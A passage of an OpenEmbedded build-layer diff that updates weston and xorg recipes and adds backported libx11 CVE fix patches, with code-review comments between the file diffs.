+- struct shell_seat *seat = get_shell_seat(keyboard->seat);
+-
+- if (seat->focused_surface) {
+- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+- if (shsurf)
+- shell_surface_deactivate(shsurf);
+- }
+-
+- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+-
+- if (seat->focused_surface) {
+- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+- if (shsurf)
+- shell_surface_activate(shsurf);
+- }
++ /* FIXME: To be removed later. */
+ }
+
+ /* The surface will be inserted into the list immediately after the link
+@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ struct shell_surface *shsurf_child, *tmp;
+ struct weston_surface *surface =
+ weston_desktop_surface_get_surface(desktop_surface);
++ struct weston_seat *seat;
+
+ if (!shsurf)
+ return;
+@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ }
+ wl_list_remove(&shsurf->children_link);
+
++ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) {
++ struct shell_seat *shseat = get_shell_seat(seat);
++ /* activate() controls the focused surface activation and
++ * removal of a surface requires invalidating the
++ * focused_surface to avoid activate() use a stale (and just
++ * removed) surface when attempting to de-activate it. It will
++ * also update the focused_surface once it has a chance to run.
++ */
++ if (surface == shseat->focused_surface)
++ shseat->focused_surface = NULL;
++ }
++
+ wl_signal_emit(&shsurf->destroy_signal, shsurf);
+
+ if (shsurf->fullscreen.black_view)
+@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+ struct workspace *ws;
+ struct weston_surface *old_es;
+ struct shell_surface *shsurf, *shsurf_child;
++ struct shell_seat *shseat = get_shell_seat(seat);
+
+ main_surface = weston_surface_get_main_surface(es);
+ shsurf = get_shell_surface(main_surface);
+@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+
+ weston_view_activate(view, seat, flags);
+
++ if (shseat->focused_surface) {
++ struct shell_surface *current_focus =
++ get_shell_surface(shseat->focused_surface);
++ assert(current_focus);
++ shell_surface_deactivate(current_focus);
++ }
++
++ shseat->focused_surface = main_surface;
++ shell_surface_activate(shsurf);
++
+ state = ensure_focus_state(shell, seat);
+ if (state == NULL)
+ return;
+--
+2.34.1
+
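Review bot: In the lines added to `activate()`, `assert(current_focus);` is the only guard before `shell_surface_deactivate(current_focus)` dereferences the pointer, whereas the code this patch removes from `handle_keyboard_focus()` tolerated a missing shell surface with `if (shsurf)`. If `focused_surface` ever has no shell surface, a build with NDEBUG gets a NULL dereference in the compositor and any other build aborts. Keeping the old tolerance, `if (current_focus) shell_surface_deactivate(current_focus);`, avoids both. The same block dereferences `shseat` from `get_shell_seat(seat)` and calls `shell_surface_activate(shsurf)` with no NULL check visible here; whether those are guaranteed non-NULL is decided by code outside the hunk.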
diff --git a/meta/recipes-graphics/wayland/weston_8.0.0.bb b/meta/recipes-graphics/wayland/weston_8.0.0.bb
index 8fef864827..5e4e2032c9 100644
--- a/meta/recipes-graphics/wayland/weston_8.0.0.bb
+++ b/meta/recipes-graphics/wayland/weston_8.0.0.bb
@@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
file://weston.desktop \
file://xwayland.weston-start \
file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \
+ file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \
+ file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \
+ file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \
"
SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3"
SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848"
@@ -70,7 +73,7 @@ PACKAGECONFIG[colord] = "-Dcolor-management-colord=true,-Dcolor-management-color
# Clients support
PACKAGECONFIG[clients] = "-Dsimple-clients=all -Ddemo-clients=true,-Dsimple-clients= -Ddemo-clients=false"
# Virtual remote output with GStreamer on DRM backend
-PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer-1.0"
+PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer1.0"
# Weston with PAM support
PACKAGECONFIG[pam] = "-Dpam=true,-Dpam=false,libpam"
# Weston with screen-share support
diff --git a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
index 65348c3762..baaf8fa9ad 100644
--- a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
+++ b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
@@ -1,4 +1,7 @@
SUMMARY = "Touchscreen calibration data from xinput-calibrator"
+DESCRIPTION = "A generic touchscreen calibration program for X.Org"
+HOMEPAGE = "https://www.freedesktop.org/wiki/Software/xinput_calibrator/"
+BUGTRACKER = "https://github.com/tias/xinput_calibrator/issues"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
index d2a16643fe..e524b82dd6 100644
--- a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
+++ b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
@@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check
REQUIRED_DISTRO_FEATURES = "x11"
SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46"
-SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \
+SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \
file://30xinput_calibrate.sh \
file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \
file://0001-calibrator.hh-Include-string-to-get-std-string.patch \
diff --git a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
index 553840ddb8..685362ef15 100644
--- a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
+++ b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf"
PV = "2.99.917+git${SRCPV}"
S = "${WORKDIR}/git"
-SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel"
+SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
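Review bot: The new `SRC_URI` still fetches over the plain `git://` transport, which gives no server authentication or transport integrity, while the xinput-calibrator change in this same diff moves to `;protocol=https`. The pinned `SRCREV` limits what a tampered fetch could deliver, but the transport should still be consistent. If the host serves this repository over HTTPS (not shown here), the line would become `SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master;protocol=https"`.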
diff --git a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
index 1ea08a6c99..6a91582068 100644
--- a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
+++ b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
@@ -10,8 +10,10 @@ LIC_FILES_CHKSUM = "file://../misc/fonts.dir;md5=82a143d94d6a974aafe97132d2d519a
SRC_URI = "file://misc"
+SOURCE_DATE_EPOCH = "1613559011"
+
PE = "1"
-PR = "r2"
+PR = "r3"
inherit allarch features_check
@@ -27,6 +29,8 @@ RDEPENDS_${PN} += "font-alias"
do_install() {
install -d ${D}/${datadir}/fonts/X11/misc
install -m 0644 ${S}/* ${D}/${datadir}/fonts/X11/misc/
+ # Pick a date/time as otherwise it would be the git checkout/modify time
+ touch -d @1613559011 ${D}/${datadir}/fonts/X11/misc/*
install -d ${D}/${libdir}/X11
ln -sf ${datadir}/fonts/X11/ ${D}/${libdir}/X11/fonts -s
}
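Review bot: The timestamp `1613559011` is written twice, once in `SOURCE_DATE_EPOCH` (previous hunk) and once in the `touch -d` line of `do_install`, so the two can drift apart on a later update. Referencing the variable keeps them tied: `touch -d @${SOURCE_DATE_EPOCH} ${D}/${datadir}/fonts/X11/misc/*`. A short comment next to `SOURCE_DATE_EPOCH` saying where the value comes from would also help whoever refreshes the fonts.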
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
new file mode 100644
index 0000000000..97c4c17a8a
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
@@ -0,0 +1,333 @@
+From 5c539ee6aba5872fcc73aa3d46a4e9a33dc030db Mon Sep 17 00:00:00 2001
+From: Matthieu Herrb <matthieu@herrb.eu>
+Date: Fri, 19 Feb 2021 15:30:39 +0100
+Subject: [PATCH] Reject string longer than USHRT_MAX before sending them on
+ the wire
+
+The X protocol uses CARD16 values to represent the length so
+this would overflow.
+
+CVE-2021-31535
+
+Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
+
+https://lists.x.org/archives/xorg-announce/2021-May/003088.html
+
+XLookupColor() and other X libraries function lack proper validation
+of the length of their string parameters. If those parameters can be
+controlled by an external application (for instance a color name that
+can be emitted via a terminal control sequence) it can lead to the
+emission of extra X protocol requests to the X server.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8d2e02ae650f00c4a53deb625211a0527126c605]
+CVE: CVE-2021-31535
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ src/Font.c | 6 ++++--
+ src/FontInfo.c | 3 +++
+ src/FontNames.c | 3 +++
+ src/GetColor.c | 4 ++++
+ src/LoadFont.c | 4 ++++
+ src/LookupCol.c | 6 ++++--
+ src/ParseCol.c | 5 ++++-
+ src/QuExt.c | 5 +++++
+ src/SetFPath.c | 8 +++++++-
+ src/SetHints.c | 7 +++++++
+ src/StNColor.c | 3 +++
+ src/StName.c | 7 ++++++-
+ 12 files changed, 54 insertions(+), 7 deletions(-)
+
+diff --git a/src/Font.c b/src/Font.c
+index 09d2ae91..3f468e4b 100644
+--- a/src/Font.c
++++ b/src/Font.c
+@@ -102,6 +102,8 @@ XFontStruct *XLoadQueryFont(
+ XF86BigfontCodes *extcodes = _XF86BigfontCodes(dpy);
+ #endif
+
++ if (strlen(name) >= USHRT_MAX)
++ return NULL;
+ if (_XF86LoadQueryLocaleFont(dpy, name, &font_result, (Font *)0))
+ return font_result;
+ LockDisplay(dpy);
+@@ -662,8 +664,8 @@ int _XF86LoadQueryLocaleFont(
+
+ if (!name)
+ return 0;
+- l = strlen(name);
+- if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-')
++ l = (int) strlen(name);
++ if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-' || l >= USHRT_MAX)
+ return 0;
+ charset = NULL;
+ /* next three lines stolen from _XkbGetCharset() */
+diff --git a/src/FontInfo.c b/src/FontInfo.c
+index f870e431..51b48e29 100644
+--- a/src/FontInfo.c
++++ b/src/FontInfo.c
+@@ -58,6 +58,9 @@ XFontStruct **info) /* RETURN */
+ register xListFontsReq *req;
+ int j;
+
++ if (strlen(pattern) >= USHRT_MAX)
++ return NULL;
++
+ LockDisplay(dpy);
+ GetReq(ListFontsWithInfo, req);
+ req->maxNames = maxNames;
+diff --git a/src/FontNames.c b/src/FontNames.c
+index b78792d6..4dac4916 100644
+--- a/src/FontNames.c
++++ b/src/FontNames.c
+@@ -51,6 +51,9 @@ int *actualCount) /* RETURN */
+ register xListFontsReq *req;
+ unsigned long rlen = 0;
+
++ if (strlen(pattern) >= USHRT_MAX)
++ return NULL;
++
+ LockDisplay(dpy);
+ GetReq(ListFonts, req);
+ req->maxNames = maxNames;
+diff --git a/src/GetColor.c b/src/GetColor.c
+index cd0eb9f6..512ac308 100644
+--- a/src/GetColor.c
++++ b/src/GetColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -48,6 +49,9 @@ XColor *exact_def) /* RETURN */
+ XcmsColor cmsColor_exact;
+ Status ret;
+
++ if (strlen(colorname) >= USHRT_MAX)
++ return (0);
++
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms and i18n approach to Parse Color
+diff --git a/src/LoadFont.c b/src/LoadFont.c
+index f547976b..85735249 100644
+--- a/src/LoadFont.c
++++ b/src/LoadFont.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include "Xlibint.h"
+
+ Font
+@@ -38,6 +39,9 @@ XLoadFont (
+ Font fid;
+ register xOpenFontReq *req;
+
++ if (strlen(name) >= USHRT_MAX)
++ return (0);
++
+ if (_XF86LoadQueryLocaleFont(dpy, name, (XFontStruct **)0, &fid))
+ return fid;
+
+diff --git a/src/LookupCol.c b/src/LookupCol.c
+index f7f969f5..cd9b1368 100644
+--- a/src/LookupCol.c
++++ b/src/LookupCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,9 @@ XLookupColor (
+ XcmsCCC ccc;
+ XcmsColor cmsColor_exact;
+
++ n = (int) strlen (spec);
++ if (n >= USHRT_MAX)
++ return 0;
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms and i18n approach to Parse Color
+@@ -77,8 +81,6 @@ XLookupColor (
+ * Xcms and i18n methods failed, so lets pass it to the server
+ * for parsing.
+ */
+-
+- n = strlen (spec);
+ LockDisplay(dpy);
+ GetReq (LookupColor, req);
+ req->cmap = cmap;
+diff --git a/src/ParseCol.c b/src/ParseCol.c
+index e997b1b8..180132dd 100644
+--- a/src/ParseCol.c
++++ b/src/ParseCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,7 +47,9 @@ XParseColor (
+ XcmsColor cmsColor;
+
+ if (!spec) return(0);
+- n = strlen (spec);
++ n = (int) strlen (spec);
++ if (n >= USHRT_MAX)
++ return(0);
+ if (*spec == '#') {
+ /*
+ * RGB
+diff --git a/src/QuExt.c b/src/QuExt.c
+index 4e230e77..d38a1572 100644
+--- a/src/QuExt.c
++++ b/src/QuExt.c
+@@ -27,6 +27,8 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
++#include <stdbool.h>
+ #include "Xlibint.h"
+
+ Bool
+@@ -40,6 +42,9 @@ XQueryExtension(
+ xQueryExtensionReply rep;
+ register xQueryExtensionReq *req;
+
++ if (strlen(name) >= USHRT_MAX)
++ return false;
++
+ LockDisplay(dpy);
+ GetReq(QueryExtension, req);
+ req->nbytes = name ? strlen(name) : 0;
+diff --git a/src/SetFPath.c b/src/SetFPath.c
+index 60aaef01..3d8c50cb 100644
+--- a/src/SetFPath.c
++++ b/src/SetFPath.c
+@@ -26,6 +26,7 @@ in this Software without prior written authorization from The Open Group.
+
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
++#include <limits.h>
+ #endif
+ #include "Xlibint.h"
+
+@@ -48,7 +49,12 @@ XSetFontPath (
+ GetReq (SetFontPath, req);
+ req->nFonts = ndirs;
+ for (i = 0; i < ndirs; i++) {
+- n += safestrlen (directories[i]) + 1;
++ n = (int) ((size_t) n + (safestrlen (directories[i]) + 1));
++ if (n >= USHRT_MAX) {
++ UnlockDisplay(dpy);
++ SyncHandle();
++ return 0;
++ }
+ }
+ nbytes = (n + 3) & ~3;
+ req->length += nbytes >> 2;
+diff --git a/src/SetHints.c b/src/SetHints.c
+index bc46498a..f3d727ec 100644
+--- a/src/SetHints.c
++++ b/src/SetHints.c
+@@ -49,6 +49,7 @@ SOFTWARE.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include "Xatomtype.h"
+@@ -214,6 +215,8 @@ XSetCommand (
+ register char *buf, *bp;
+ for (i = 0, nbytes = 0; i < argc; i++) {
+ nbytes += safestrlen(argv[i]) + 1;
++ if (nbytes >= USHRT_MAX)
++ return 1;
+ }
+ if ((bp = buf = Xmalloc(nbytes))) {
+ /* copy arguments into single buffer */
+@@ -256,6 +259,8 @@ XSetStandardProperties (
+
+ if (name != NULL) XStoreName (dpy, w, name);
+
++ if (safestrlen(icon_string) >= USHRT_MAX)
++ return 1;
+ if (icon_string != NULL) {
+ XChangeProperty (dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+ PropModeReplace,
+@@ -298,6 +303,8 @@ XSetClassHint(
+
+ len_nm = safestrlen(classhint->res_name);
+ len_cl = safestrlen(classhint->res_class);
++ if (len_nm + len_cl >= USHRT_MAX)
++ return 1;
+ if ((class_string = s = Xmalloc(len_nm + len_cl + 2))) {
+ if (len_nm) {
+ strcpy(s, classhint->res_name);
+diff --git a/src/StNColor.c b/src/StNColor.c
+index 8b821c3e..ba021958 100644
+--- a/src/StNColor.c
++++ b/src/StNColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,8 @@ int flags) /* DoRed, DoGreen, DoBlue */
+ XcmsColor cmsColor_exact;
+ XColor scr_def;
+
++ if (strlen(name) >= USHRT_MAX)
++ return 0;
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms approach to Parse Color
+diff --git a/src/StName.c b/src/StName.c
+index b4048bff..5a632d0c 100644
+--- a/src/StName.c
++++ b/src/StName.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xatom.h>
+
+@@ -36,7 +37,9 @@ XStoreName (
+ Window w,
+ _Xconst char *name)
+ {
+- return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING,
++ if (strlen(name) >= USHRT_MAX)
++ return 0;
++ return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING, /* */
+ 8, PropModeReplace, (_Xconst unsigned char *)name,
+ name ? strlen(name) : 0);
+ }
+@@ -47,6 +50,8 @@ XSetIconName (
+ Window w,
+ _Xconst char *icon_name)
+ {
++ if (strlen(icon_name) >= USHRT_MAX)
++ return 0;
+ return XChangeProperty(dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+ PropModeReplace, (_Xconst unsigned char *)icon_name,
+ icon_name ? strlen(icon_name) : 0);
+--
+2.32.0
+
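Review bot: Several of the added length checks call `strlen()` on a pointer that the unchanged code directly below treats as possibly NULL. In `XQueryExtension` the new `strlen(name)` runs before `req->nbytes = name ? strlen(name) : 0;`, and `XStoreName` and `XSetIconName` do the same ahead of `name ? strlen(name) : 0` and `icon_name ? strlen(icon_name) : 0`, so a NULL argument that was accepted before now crashes in the check. Guarding the test keeps the old contract, e.g. `if (name != NULL && strlen(name) >= USHRT_MAX)`; `XSetStandardProperties` goes through `safestrlen(icon_string)` instead, which presumably tolerates NULL. Separately, in `src/SetFPath.c` the `#include <limits.h>` lands inside the `#ifdef HAVE_CONFIG_H` block, so `USHRT_MAX` depends on that macro unless another header supplies it.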
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
new file mode 100644
index 0000000000..fb61195225
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
@@ -0,0 +1,58 @@
+From 8b51d1375a4dd6a7cf3a919da83d8e87e57e7333 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 2 Nov 2022 17:04:15 +0530
+Subject: [PATCH] CVE-2022-3554
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/1d11822601fd24a396b354fa616b04ed3df8b4ef]
+CVE: CVE-2022-3554
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+fix a memory leak in XRegisterIMInstantiateCallback
+
+Analysis:
+
+ _XimRegisterIMInstantiateCallback() opens an XIM and closes it using
+ the internal function pointers, but the internal close function does
+ not free the pointer to the XIM (this would be done in XCloseIM()).
+
+Report/patch:
+
+ Date: Mon, 03 Oct 2022 18:47:32 +0800
+ From: Po Lu <luangruo@yahoo.com>
+ To: xorg-devel@lists.x.org
+ Subject: Re: Yet another leak in Xlib
+
+ For reference, here's how I'm calling XRegisterIMInstantiateCallback:
+
+ XSetLocaleModifiers ("");
+ XRegisterIMInstantiateCallback (compositor.display,
+ XrmGetDatabase (compositor.display),
+ (char *) compositor.resource_name,
+ (char *) compositor.app_name,
+ IMInstantiateCallback, NULL);
+ and XMODIFIERS is:
+
+ @im=ibus
+
+Signed-off-by: Thomas E. Dickey's avatarThomas E. Dickey <dickey@invisible-island.net>
+---
+ modules/im/ximcp/imInsClbk.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/modules/im/ximcp/imInsClbk.c b/modules/im/ximcp/imInsClbk.c
+index 961aaba..0a8a874 100644
+--- a/modules/im/ximcp/imInsClbk.c
++++ b/modules/im/ximcp/imInsClbk.c
+@@ -204,6 +204,9 @@ _XimRegisterIMInstantiateCallback(
+ if( xim ) {
+ lock = True;
+ xim->methods->close( (XIM)xim );
++ /* XIMs must be freed manually after being opened; close just
++ does the protocol to deinitialize the IM. */
++ XFree( xim );
+ lock = False;
+ icb->call = True;
+ callback( display, client_data, NULL );
+--
+2.25.1
+
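Review bot: The patch header no longer identifies the upstream change it backports: the subject is reduced to `CVE-2022-3554`, the `From:` line names the backporter, and the sign-off reads `Thomas E. Dickey's avatarThomas E. Dickey`, which looks like text copied from a rendered web page. Restoring the upstream subject (the body's `fix a memory leak in XRegisterIMInstantiateCallback`) and a clean `Signed-off-by: Thomas E. Dickey <dickey@invisible-island.net>` would make the backport auditable against the commit named in `Upstream-Status`. On the code, the added `XFree( xim )` relies on `xim->methods->close()` not freeing the structure itself; the commit message says so, but the close implementation is outside this hunk.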
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
new file mode 100644
index 0000000000..855ce80e77
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
@@ -0,0 +1,38 @@
+From 8a368d808fec166b5fb3dfe6312aab22c7ee20af Mon Sep 17 00:00:00 2001
+From: Hodong <hodong@yozmos.com>
+Date: Thu, 20 Jan 2022 00:57:41 +0900
+Subject: [PATCH] Fix two memory leaks in _XFreeX11XCBStructure()
+
+Even when XCloseDisplay() was called, some memory was leaked.
+
+XCloseDisplay() calls _XFreeDisplayStructure(), which calls
+_XFreeX11XCBStructure().
+
+However, _XFreeX11XCBStructure() did not destroy the condition variables,
+resulting in the leaking of some 40 bytes.
+
+Signed-off-by: Hodong <hodong@yozmos.com>
+
+Upstream-Status: Backport from [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8a368d808fec166b5fb3dfe6312aab22c7ee20af]
+CVE:CVE-2022-3555
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/xcb_disp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/xcb_disp.c b/src/xcb_disp.c
+index 70a602f4..e9becee3 100644
+--- a/src/xcb_disp.c
++++ b/src/xcb_disp.c
+@@ -102,6 +102,8 @@ void _XFreeX11XCBStructure(Display *dpy)
+ dpy->xcb->pending_requests = tmp->next;
+ free(tmp);
+ }
++ xcondition_clear(dpy->xcb->event_notify);
++ xcondition_clear(dpy->xcb->reply_notify);
+ xcondition_free(dpy->xcb->event_notify);
+ xcondition_free(dpy->xcb->reply_notify);
+ Xfree(dpy->xcb);
+--
+2.18.2
+
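Review bot: The tag line `CVE:CVE-2022-3555` has no space after the colon, unlike the `CVE: CVE-…` form used by the other patches in this diff, so tooling that matches the tag text may miss it (the file name still carries the id). The status line also has a stray `from`; the other patches use `Upstream-Status: Backport [URL]`. Suggested tag: `CVE: CVE-2022-3555`.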
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
new file mode 100644
index 0000000000..c724cf8fdd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
@@ -0,0 +1,111 @@
+From 304a654a0d57bf0f00d8998185f0360332cfa36c Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sat, 10 Jun 2023 16:30:07 -0700
+Subject: [PATCH] InitExt.c: Add bounds checks for extension request, event, &
+ error codes
+
+Fixes CVE-2023-3138: X servers could return values from XQueryExtension
+that would cause Xlib to write entries out-of-bounds of the arrays to
+store them, though this would only overwrite other parts of the Display
+struct, not outside the bounds allocated for that structure.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+CVE: CVE-2023-3138
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c.patch]
+Signed-off-by: Poonam Jadhav <poonam.jadhav@kpit.com>
+---
+ src/InitExt.c | 42 ++++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 42 insertions(+)
+
+diff --git a/src/InitExt.c b/src/InitExt.c
+index 4de46f15..afc00a6b 100644
+--- a/src/InitExt.c
++++ b/src/InitExt.c
+@@ -33,6 +33,18 @@ from The Open Group.
+ #include <X11/Xos.h>
+ #include <stdio.h>
+
++/* The X11 protocol spec reserves events 64 through 127 for extensions */
++#ifndef LastExtensionEvent
++#define LastExtensionEvent 127
++#endif
++
++/* The X11 protocol spec reserves requests 128 through 255 for extensions */
++#ifndef LastExtensionRequest
++#define FirstExtensionRequest 128
++#define LastExtensionRequest 255
++#endif
++
++
+ /*
+ * This routine is used to link a extension in so it will be called
+ * at appropriate times.
+@@ -242,6 +254,12 @@ WireToEventType XESetWireToEvent(
+ WireToEventType proc) /* routine to call when converting event */
+ {
+ register WireToEventType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (WireToEventType)_XUnknownWireEvent;
++ }
+ if (proc == NULL) proc = (WireToEventType)_XUnknownWireEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->event_vec[event_number];
+@@ -263,6 +281,12 @@ WireToEventCookieType XESetWireToEventCookie(
+ )
+ {
+ WireToEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (WireToEventCookieType)_XUnknownWireEventCookie;
++ }
+ if (proc == NULL) proc = (WireToEventCookieType)_XUnknownWireEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_vec[extension & 0x7F];
+@@ -284,6 +308,12 @@ CopyEventCookieType XESetCopyEventCookie(
+ )
+ {
+ CopyEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (CopyEventCookieType)_XUnknownCopyEventCookie;
++ }
+ if (proc == NULL) proc = (CopyEventCookieType)_XUnknownCopyEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_copy_vec[extension & 0x7F];
+@@ -305,6 +335,12 @@ EventToWireType XESetEventToWire(
+ EventToWireType proc) /* routine to call when converting event */
+ {
+ register EventToWireType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (EventToWireType)_XUnknownNativeEvent;
++ }
+ if (proc == NULL) proc = (EventToWireType) _XUnknownNativeEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->wire_vec[event_number];
+@@ -325,6 +361,12 @@ WireToErrorType XESetWireToError(
+ WireToErrorType proc) /* routine to call when converting error */
+ {
+ register WireToErrorType oldproc = NULL;
++ if (error_number < 0 ||
++ error_number > LastExtensionError) {
++ fprintf(stderr, "Xlib: ignoring invalid extension error %d\n",
++ error_number);
++ return (WireToErrorType)_XDefaultWireError;
++ }
+ if (proc == NULL) proc = (WireToErrorType)_XDefaultWireError;
+ LockDisplay (dpy);
+ if (!dpy->error_vec) {
+--
+GitLab
